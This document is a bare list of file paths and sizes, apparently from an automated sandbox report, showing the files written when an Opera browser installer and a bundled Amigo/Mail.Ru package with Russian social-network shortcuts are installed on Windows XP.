    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\20.tmp (52 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\5A5BEF2B5F5EF69232280A995B9D2FA7 (156 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_GV1rG49dpArioGw (532 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Web Data (22643 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Extension State\000003.log (1692 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab14.tmp (54 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\29.tmp (32 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar1B.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\38.tmp (32 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\1D.tmp (5 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Web Data-journal (4492 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (54 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\2C.tmp (32 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\26FAECAB15AD715CB7849E2211F9473B (520 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab11.tmp (54 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\37.tmp (32 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (1224 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\30.tmp (552 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\35.tmp (32 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Current Session (1997 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\27.tmp (805 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\21.tmp (381 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\26FAECAB15AD715CB7849E2211F9473B (86 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab1C.tmp (49 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0270780F846F08BEFE0DD8112D932FEF (543 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar15.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Favicons-journal (20160 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar17.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\22.tmp (32 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C8E7EC0C85688F4738F3BE49B104BA67 (1298 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\2A.tmp (32 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\36.tmp (32 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Cookies (1043 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Visited Links (560 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\2B.tmp (459 bytes)
    %WinDir%\Tasks\Opera scheduled Autoupdate 1450553101.job (68 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\siteprefs.json.new (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_RZPzBVWNzpValWY (316 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2D.tmp (501 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab19.tmp (49 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\40C68D5626484A90937F0752C8B950AB (1066 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Local Storage\browser_startpage_0.localstorage-journal (5554 bytes)
    %System%\d3d9caps.tmp (1324 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (54 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2D0EAFE99DD0474CD3DF1720DC4B3759 (220 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Extension State\MANIFEST-000001 (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2E.tmp (105 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Cookies-journal (5308 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Certificate Revocation Lists (501 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\1A.tmp (643 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\69C6F6EC64E114822DF688DC12CDD86C (531 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\dictionaries\dictionaries.xml (11 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\default_partner_content.json (1281 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Extension State\LOG (153 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\5A5BEF2B5F5EF69232280A995B9D2FA7 (200 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0A2EA55F20CC96EF43A26E7FAF8A2217 (280 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar12.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\History-journal (18376 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0270780F846F08BEFE0DD8112D932FEF (268 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_wdq57A8ptfRDlCo (514 bytes)
    %Program Files%\Opera\Assets\150x150Logo.scale-80.png (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Opera.lnk (675 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\pt-BR.pak (673 bytes)
    %Program Files%\Opera\Assets\150x150Logo.scale-180.png (7 bytes)
    %Program Files%\Opera\Assets\150x150Logo.scale-140.png (5 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\zh-TW.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\wow_helper.exe (601 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\standard_themes\default_theme.zip (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\standard_themes\landscape_photo.zip (1425 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\07593226-C5C5-438B-86BE-3F6361CD5B10.ico (1 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\ko.pak (673 bytes)
    %Program Files%\Opera\Assets\150x150Logo.scale-100.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212501.log (124819 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\en-US.pak (601 bytes)
    %Program Files%\Opera\34.0.2036.41\opera.dll (467066 bytes)
    %Program Files%\Opera\Assets\70x70Logo.scale-80_contrast-white.png (1 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\fi.pak (673 bytes)
    %Program Files%\Opera\Assets\70x70Logo.scale-180_contrast-white.png (2 bytes)
    %Program Files%\Opera\34.0.2036.41\message_center_win8.dll (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\hr.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\libEGL.dll (601 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\ms.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\vi.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\mk.pak (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\el.pak (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\nb.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\nn.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\osmesa.dll (22350 bytes)
    %Program Files%\Opera\Resources.pri (3 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\4C95ADC1-5FD9-449D-BC75-77CA217403AE.ico (1 bytes)
    %Program Files%\Opera\Assets\150x150Logo.scale-100_contrast-white.png (2 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\uk.pak (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Opera.lnk (675 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\sk.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\opera_crashreporter.exe (3073 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\te.pak (1425 bytes)
    %Program Files%\Opera\Assets\70x70Logo.scale-100_contrast-white.png (1 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\standard_themes\reine.zip (53 bytes)
    %Program Files%\Opera\34.0.2036.41\clearkeycdm.dll (8281 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\lt.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\standard_themes\darkbreeze.zip (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\en-GB.pak (601 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\ru.pak (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\1AF2CDD0-8BF3-11E2-9E96-0800200C9A66.ico (1 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\013E742B-287B-4228-A0B9-BD617E4E02A4.ico (1 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\default_localized_themes.json (100 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\az.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\F3F34CBB-24FF-4830-9E87-1663E7A0A5EE.ico (2 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\standard_themes\grey.zip (289 bytes)
    %Program Files%\Opera\34.0.2036.41\snapshot_blob.bin (3073 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\ta.pak (2105 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\2F8F0E41-F521-45A4-9691-F664AFAFE67F.ico (17 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\th.pak (1425 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\uz.pak (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\3BFDFA54-5DD6-4DFF-8B6C-C1715F306D6B.ico (4 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\fr.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\ro.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\zu.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\bg.pak (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\license.txt (18 bytes)
    %Program Files%\Opera\Assets\70x70Logo.scale-80.png (1 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\hu.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\3B6191A0-8BF3-11E2-9E96-0800200C9A66.ico (5 bytes)
    %Program Files%\Opera\Assets\70x70Logo.scale-100.png (2 bytes)
    %Program Files%\Opera\34.0.2036.41\msvcr100.dll (5441 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\gd.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\me.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\d3dcompiler_47.dll (23811 bytes)
    %Program Files%\Opera\34.0.2036.41\clearkeycdmadapter.dll (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\0CD5F3A0-8BF6-11E2-9E96-0800200C9A66.ico (17 bytes)
    %Program Files%\Opera\34.0.2036.41\opera_100_percent.pak (8281 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\F98D4D4C-8AA7-4619-A1E7-AC89B24558DD.ico (1 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\nl.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\opera_250_percent.pak (5873 bytes)
    %Program Files%\Opera\34.0.2036.41\win8_importing.dll (601 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\dictionaries.xml (11 bytes)
    %Program Files%\Opera\8.tmp (476 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\6D3582E1-6013-429F-BB34-C75B90CDD1F8.ico (1 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\2A3F5C20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\be.pak (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\pt-PT.pak (673 bytes)
    %Program Files%\Opera\Assets\150x150Logo.scale-180_contrast-white.png (5 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\pl.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\es-419.pak (673 bytes)
    %Program Files%\Opera\Assets\150x150Logo.scale-80_contrast-white.png (1 bytes)
    %Program Files%\Opera\34.0.2036.41\opera_autoupdate.licenses (14 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Opera.lnk (675 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\lv.pak (673 bytes)
    %Program Files%\Opera\launcher.visualelementsmanifest.xml (317 bytes)
    %Program Files%\Opera\installation_status.xml (10 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\66DD4BB6-A3BA-4B11-AF7A-F4BF23E073B2.ico (15 bytes)
    %Program Files%\Opera\34.0.2036.41\opera_150_percent.pak (7547 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\hi.pak (1425 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\sv.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\fil.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\it.pak (673 bytes)
    %Program Files%\Opera\Assets\70x70Logo.scale-140_contrast-white.png (1 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\cs.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\CFCE84E5-9A95-4B3F-B8E4-3E98CF7EE6C5.ico (34 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\fy.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\1CF37043-6733-479C-9086-7B21A2292DDA.ico (2 bytes)
    %Program Files%\Opera\Assets\70x70Logo.scale-140.png (2 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\C665D993-1B49-4C2E-962C-BEB19993BB86.ico (17 bytes)
    %Program Files%\Opera\server_tracking_data (641 bytes)
    %Program Files%\Opera\34.0.2036.41\natives_blob.bin (2321 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\zh-CN.pak (601 bytes)
    %Program Files%\Opera\34.0.2036.41\opera_autoupdate.exe (26831 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\kk.pak (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\ab_tests.json (560 bytes)
    %Program Files%\Opera\34.0.2036.41\mojo_public_test_support.dll (601 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\es.pak (673 bytes)
    %Program Files%\Opera\launcher.exe (4545 bytes)
    %Program Files%\Opera\34.0.2036.41\opera_125_percent.pak (7433 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\de.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\AD2FD2BD-0727-4AF7-8917-AAED8627ED47.ico (1 bytes)
    %Program Files%\Opera\Assets\150x150Logo.scale-140_contrast-white.png (3 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\5BBBDD5B-EDC7-4168-9F5D-290AF826E716.ico (1 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\FF57F01A-0718-44B7-8A1F-8B15BC33A50B.ico (5 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\tr.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\libGLESv2.dll (14988 bytes)
    %Program Files%\Opera\34.0.2036.41\widevinecdmadapter.dll (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\ca.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\CFD4BE41-4C6D-496A-ADDB-4095DFA1DD0E.ico (5 bytes)
    %Program Files%\Opera\34.0.2036.41\msvcp100.dll (2321 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\sr.pak (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\8D754F20-8BF5-11E2-9E96-0800200C9A66.ico (6 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\sw.pak (673 bytes)
    %Program Files%\Opera\Assets\notification_default.png (2 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico (1 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico (17 bytes)
    %Program Files%\Opera\34.0.2036.41\icudtl.dat (78553 bytes)
    %Program Files%\Opera\34.0.2036.41\opera.pak (142858 bytes)
    %Program Files%\Opera\34.0.2036.41\dbghelp.dll (7726 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\ja.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\af.pak (673 bytes)
    %Documents and Settings%\All Users\Desktop\Opera.lnk (675 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\76C397A8-9E8E-4706-8203-BD2878E9C618.ico (1 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\default_partner_content.json (1281 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico (1 bytes)
    %Program Files%\Opera\Assets\70x70Logo.scale-180.png (4 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\bn.pak (1425 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\da.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\he.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\fr-CA.pak (673 bytes)
    %Program Files%\Opera\34.0.2036.41\installer.exe (8281 bytes)
    %Program Files%\Opera\34.0.2036.41\opera_autoupdate.version (6 bytes)
    %Program Files%\Opera\34.0.2036.41\resources\B478FE0C-0761-41C3-946F-CD1340356039.ico (1 bytes)
    %Program Files%\Opera\34.0.2036.41\opera_200_percent.pak (10815 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\pa.pak (1425 bytes)
    %Program Files%\Opera\34.0.2036.41\opera.exe (4185 bytes)
    %Program Files%\Opera\34.0.2036.41\localization\id.pak (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\index[1].htm (2090 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\amipb[1].js (33981 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amisetup9338__14991.exe:typelib (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (113 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amisetup9364__14991.exe:typelib (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (2090 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\31.tmp (934 bytes)
    %Program Files%\Opera\1F.tmp (500 bytes)
    %WinDir%\Temp\opera autoupdate\opera_autoupdate.log (215 bytes)
    %WinDir%\Temp\opera autoupdate\installer.exe (8281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ro.pak (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\delegate_execute.exe (3707 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\fa.pak (1648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\lt.pak (257 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ar.pak (1629 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\natives_blob.bin (1677 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amigo_FFA3C3E0-B3B6-4D8C-928C-75AA59A806A0\UnityWebPlayer.exe (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Extensions\external_extensions.json (103 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\resources.pak (142877 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\cs.pak (258 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\gu.pak (1796 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome_elf.dll (132 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ml.pak (3735 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ru.pak (1675 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\mm.exe (130 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Вконтакте.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe (4545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\mm.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\te.pak (1863 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\libglesv2.dll (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\it.pak (252 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Вконтакте.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ta.pak (3682 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\amigo_resources.pak (28502 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Одноклассники.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\id.pak (228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ko.pak (263 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\vk.exe (167 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\snapshot_blob.bin (1717 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\44.4.2403.3.manifest (248 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\bn.pak (1830 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\es-419.pak (259 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\VisualElements\logo.png (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\hr.pak (244 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\vk.exe (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\xinput1_3.dll (81 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\tr.pak (254 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\sv.pak (235 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\et.pak (228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\fi.pak (242 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\libegl.dll (81 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\hu.pak (272 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome_child.dll (307964 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\icudtl.dat (75554 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\nl.pak (247 bytes)
    %Documents and Settings%\%current user%\Desktop\Вконтакте.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\fil.pak (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\unitywebplayer.exe (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\chrome_200_percent.pak (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\44.4.2403.3\Installer\setup.exe (7345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\ja.pak (308 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Интернет.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\ok.exe (142 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\sw.pak (236 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\pl.pak (253 bytes)
    %Documents and Settings%\%current user%\Desktop\Интернет.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\nacl_irt_x86_32.nexe (17629 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\sl.pak (241 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Одноклассники.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amigo_FFA3C3E0-B3B6-4D8C-928C-75AA59A806A0\MailRuUpdater.exe (39945 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\ok.exe (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\pt-PT.pak (254 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\nacl64.exe (12289 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\Chrome-bin\44.4.2403.3\Locales\es.pak (263 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source2672_18428\chrome.7z (1266233 bytes)
